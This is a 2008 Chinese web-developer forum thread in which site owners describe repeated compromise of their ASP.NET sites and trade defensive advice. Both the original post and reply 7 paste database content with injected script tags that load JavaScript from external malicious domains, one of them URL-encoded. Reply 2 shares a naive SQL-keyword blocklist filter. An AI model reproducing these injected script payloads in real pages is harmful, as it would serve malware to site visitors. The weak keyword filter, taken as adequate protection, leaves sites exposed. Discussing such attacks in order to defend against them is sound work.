首页 新闻 论坛 群组 Blog 文档 下载 读书 Tag 网摘 搜索 .NET Java 游戏 视频 人才 外包 培训 数据库 书店 程序员
中国软件网
欢迎您:游客 | 登录 注册 帮助
  • 网站被攻击,这个人很变态,恢复了又来,4,5次了.100求救!
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 00:22:53 楼主
    <option value="287">A-阿坝藏族羌族自治州&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="900">A-阿德莱德&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="1086">A-阿加纳区&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="1074">A-阿卡普尔科-德华雷斯&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="316">A-阿克苏&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="317">A-阿拉尔&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="224">A-阿拉善盟&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="762">A-阿勒泰&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="309">A-阿里&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="937">A-阿姆斯特丹&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="982">A-阿斯旺&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="905">A-爱丁堡&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="833">A-安吉&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="891">A-安卡拉&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="276">A-安康&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="896">A-安曼&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="1">A-安庆&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="77">A-安顺&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="892">A-安塔利亚&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="799">A-安图&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="115">A-安阳&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="1033">A-安阳&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    <option value="210">A-鞍山&quot;&gt;&lt;/title&gt;&lt;script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js&gt;&lt;/scr </option>
    在下拉列表框多了这些东西.要怎么来防,很多能注入的我都写了过滤.还是被攻击.还有这个恶意攻击可能报案,有这方面的朋友可介绍一下,根据大家回贴的结果.公布他的IP或上网习性(这个人不能用习惯这词)
    100  修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • txgaozhao
    • 等级:
    发表于:2008-05-09 00:27:231楼 得分:0
    找网络警察帮助
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 00:51:412楼 得分:0
    呵呵,我遇到和你一样的问题,是你的网站有漏洞了,估计入侵者是用工具搞的,做WEB程序要特别考虑到SQL注入的漏洞。
    不过后来我加上“补丁”严格过滤httprequest就没有再被入侵了。

    下面是我找到的方法(感谢无私奉献的原作者),用在我自己的网站上咯,嘿嘿,再也没有被入侵过了!!

    在Global.asax文件中,如果不懂Global.asax文件,可以www.baidu.com一下,好多的,这个Global.asax用熟练了可以解决很多问题呵。 下面的方法过滤比较严格,如果用户在其它的输入包含敏感数据,都会被拒绝。

    C# code
    protected void Application_BeginRequest(Object sender, EventArgs e) { //SQL防注入 string Sql_1 = "exec|insert+|select+|delete|update|count|chr|mid|master+|truncate|char|declare|drop+|drop+table|creat+|creat+table"; string Sql_2 = "exec+|insert+|delete+|update+|count(|count+|chr+|+mid(|+mid+|+master+|truncate+|char+|+char(|declare+|drop+|creat+|drop+table|creat+table"; string[] sql_c = Sql_1.Split('|'); string[] sql_c1 = Sql_2.Split('|');    if(Request.QueryString != null) { foreach (string sl in sql_c) { if(Request.QueryString.ToString().ToLower().IndexOf(sl.Trim()) >=0) { Response.Write("警告!你的IP已经被记录!");//吓唬人的 Response.Write(sl); Response.Write(Request.QueryString.ToString()); //System.Windows.Forms.MessageBox.Show("禁止提交外部数据","1",System.Windows.F //orms.MessageBoxButtons.OK,System.Windows.Forms.MessageBoxIcon.Error,System.Windows.Forms.MessageBoxDefaultButton.Button1,System.Windows.Forms.MessageBoxOptions.DefaultDesktopOnly); //Response.Redirect("http://www.163.com"); Response.End(); break; } } } if(Request.Form.Count > 0) { string s1 = Request.ServerVariables["SERVER_NAME"].Trim();//服务器名称 if(Request.ServerVariables["HTTP_REFERER"] != null) { string s2 = Request.ServerVariables["HTTP_REFERER"].Trim();//http接收的名称 string s3 = ""; if(s1.Length > (s2.Length -7)) { s3 = s2.Substring(7); } else { s3 = s2.Substring(7,s1.Length); } if(s3 != s1) { Response.Write("你的IP已被记录!警告!");//吓人的 //System.Windows.Forms.MessageBox.Show("禁止提交外部数据","1",System.Windows.Forms.MessageBoxButtons.OK,Sy //stem.Windows.Forms.MessageBoxIcon.Error,System.Windows.Forms.MessageBoxDefaultButton.Button1,System.Windows.Forms.MessageBoxOptions.DefaultDesktopOnly); //Response.Redirect("http://www.163.com"); Response.End(); } } } }

    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 01:04:423楼 得分:0
    嗯嗯,支持..
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • Miracle
    • 等级:
    发表于:2008-05-09 01:59:304楼 得分:0
    ARP攻击,不一定是你的机器中招了,可能是托管机房……
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 02:24:325楼 得分:0
    你贴代码没有用。

    你连攻击手段属于哪种技术都不知道,只能乖乖作肉鸡了。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 02:26:386楼 得分:0
    这个几乎跟sql注入没有关系。

    不信你自己开放漏洞,自己注入看看,能条条这么注入,他不如干苦力。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 04:55:437楼 得分:0
    呵呵,,今天碰到和楼主一样的问题了。

    我觉得不一定是SQL注入吧。
    像那些危险的字符串我相信都有过滤掉,而且 自己还用了一些黑软来检测自己的网站,并没有发现有注入点。


    这个问题我碰到过两次了。。郁闷。。。


    ===========================================================================================
    第五届台州国际电动车及零配件展 <script src=http://bbs.jueduizuan.com/ip.js> </script> zerocold <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> 由黄岩区人民政府主办、台州市自 <script src=http://bbs.jueduizuan.com/ip.js> </script>
    浙江省家电市场举办13周岁庆典活 <script src=http://bbs.jueduizuan.com/ip.js> </script> zerocold <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> 浙江省家电市场以“倡导诚信经营 <script src=http://bbs.jueduizuan.com/ip.js> </script>
    阿迪达斯称球衣用五星红旗图案是 <script src=http://bbs.jueduizuan.com/ip.js> </script> zerocold <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> <STRONG>阿迪达斯全球召回“国旗 <script src=http://bbs.jueduizuan.com/ip.js> </script>
    绍兴三珍斋品牌重塑---网上多开 < <script src=http://bbs.jueduizuan.com/ip.js> </script> 大熊 <script src=http://www.119 <script src=http://bbs.jueduizuan.com/ip.js> </script> 虽然流水只相当于一间超市单店, <script src=http://bbs.jueduizuan.com/ip.js> </script>
    最大显示器品牌冠捷--进军笔记本 <script src=http://bbs.jueduizuan.com/ip.js> </script> zerocold <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> 昨日,据知情人士透露,全球最大 <script src=http://bbs.jueduizuan.com/ip.js> </script>
    德意召开“新天弧”新品上市发布 <script src=http://bbs.jueduizuan.com/ip.js> </script> zerocold <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> 3月12日,杭州金马饭店,来自中国?script src=http://bbs.jueduizuan.com/ip.js> </script>
    ZARA08春夏---打造精品男人 <scri <script src=http://bbs.jueduizuan.com/ip.js> </script> zerocold <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> 如果你是时尚的忠实成员,但却没 <script src=http://bbs.jueduizuan.com/ip.js> </script>
    MCLEMAN(男士内衣)体现其独特的 < <script src=http://bbs.jueduizuan.com/ip.js> </script> zerocold <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> &nbsp;MCLEMAN(男士内衣)以人文?script src=http://bbs.jueduizuan.com/ip.js> </script>
    耐克推出2008春季84系列新品 <scr <script src=http://bbs.jueduizuan.com/ip.js> </script> zerocold <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> 今年春季,耐克推出2008春季耐克 <script src=http://bbs.jueduizuan.com/ip.js> </script>
    w-smoon品牌女装演绎生活和工作 < <script src=http://bbs.jueduizuan.com/ip.js> </script> zerocold <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> w-smoon品牌服务于有着积极的生?script src=http://bbs.jueduizuan.com/ip.js> </script>
    服装直销行业大洗牌---大批直销 < <script src=http://bbs.jueduizuan.com/ip.js> </script> ZEROCOLD <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> 2008年3月13日,互联网实验室发?script src=http://bbs.jueduizuan.com/ip.js> </script>
    中国运动休闲服装名镇--五年引进 <script src=http://bbs.jueduizuan.com/ip.js> </script> ZEROCOLD <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> 从2002年的9563万元到去年的3071 <script src=http://bbs.jueduizuan.com/ip.js> </script>
    320多名批发商进驻石狮服装城 <sc <script src=http://bbs.jueduizuan.com/ip.js> </script> ZEROCOLD <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> 上周,320多名服装批发商在石狮?script src=http://bbs.jueduizuan.com/ip.js> </script>
    精装修房众口难调---用家具饰品 < <script src=http://bbs.jueduizuan.com/ip.js> </script> ZEROCOLD <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> [编者按]在年轻白领有的人青睐北 <script src=http://bbs.jueduizuan.com/ip.js> </script>
    营造装修气氛---装饰才是美化家 < <script src=http://bbs.jueduizuan.com/ip.js> </script> ZEROCOLD <script src=http://www <script src=http://bbs.jueduizuan.com/ip.js> </script> <TABLE cellSpacing=0 cellPaddi <script src=http://bbs.jueduizuan.com/ip.js> </script>

    ====================================================================================
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • amandag
    • 等级:
    发表于:2008-05-09 08:32:168楼 得分:0
    up
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 08:49:479楼 得分:0
    关注
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:00:4910楼 得分:0
    学习学习
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:03:3111楼 得分:0
    这种问题还真没遇到过。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:08:2812楼 得分:0
    1.检查SQL注入,检查所有传参数的SQL。把单引号和所有敏感字符(包括大小写)都replace掉。 
    2.检查所有服务器端的可疑文件,jpg也不要放过
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:11:4513楼 得分:0
    关注,学习,等待完整解决方案
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:12:5114楼 得分:0
    我的网站也是,就是被sql注入了,应该是后台数据库里面被改了,而不是在前台改的
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • octverve
    • 等级:
    发表于:2008-05-09 09:18:3915楼 得分:0
    不像~
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • abandonship
    • 等级:
    发表于:2008-05-09 09:22:0716楼 得分:0
    http://blog.csdn.net/abandonship/archive/2008/03/03/2142299.aspx
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • abandonship
    • 等级:
    发表于:2008-05-09 09:23:0717楼 得分:0
    其实就是挂马了
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • abandonship
    • 等级:
    发表于:2008-05-09 09:23:5918楼 得分:0
    多半是Server-U被攻击了,从那中的
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • bbw5
    • 等级:
    发表于:2008-05-09 09:24:3019楼 得分:0
    你看看你的原文件有没有给人改啊?这样才比较清楚是sql注入还是ARP攻击啊
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:28:5620楼 得分:0
    顶,从来没遇到过这个问题,预防了!!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:29:0321楼 得分:0
    1:先看看你的iis的日志,看看是不是sql inject 的方式进来的,
    象你这样的问题,基本上是sql  inject的,不象arp ,

    2:看看你的数据库有没有没back过,

    3:对于sql inject 这样的,先降数据库用户权限。

    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:30:1722楼 得分:0
    引用 14 楼 AccessManager 的回复:
    我的网站也是,就是被sql注入了,应该是后台数据库里面被改了,而不是在前台改的


    权限:有些表只能select 不能update !
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • iuhxq
    • 等级:
    发表于:2008-05-09 09:32:3023楼 得分:0
    Response.Write("警告!你的IP已经被记录!");//吓唬人的
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • qiuming0306
    • 等级:
    发表于:2008-05-09 09:38:3924楼 得分:0
    引用 23 楼 iuhxq 的回复:
    Response.Write("警告!你的IP已经被记录!");//吓唬人的

    这个只能吓唬菜鸟吧!不过挂马的也不会是有层次的人做的!o(∩_∩)o...
    是数据库数据被篡改了!你的数据库表的TEXT,nvarchar 字段被修改VALUE了!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:39:2825楼 得分:0
    引用 23 楼 iuhxq 的回复:
    Response.Write("警告!你的IP已经被记录!");//吓唬人的

    这样只能更得罪人
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • iuhxq
    • 等级:
    发表于:2008-05-09 09:41:2326楼 得分:0
    你分析一下IIS日志吧,这样才能根本的解决问题。

    这么猜测不是办法。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • hy_lihuan
    • 等级:
    发表于:2008-05-09 09:42:4927楼 得分:0
    没想法,需要实际情况分析
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:47:5128楼 得分:0
    关注
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:52:2829楼 得分:0
    xuexi !!!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 10:09:5730楼 得分:0
    学习
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 10:10:1431楼 得分:0
    引用 1 楼 txgaozhao 的回复:
    找网络警察帮助
    修改 删除 举报 引用 回复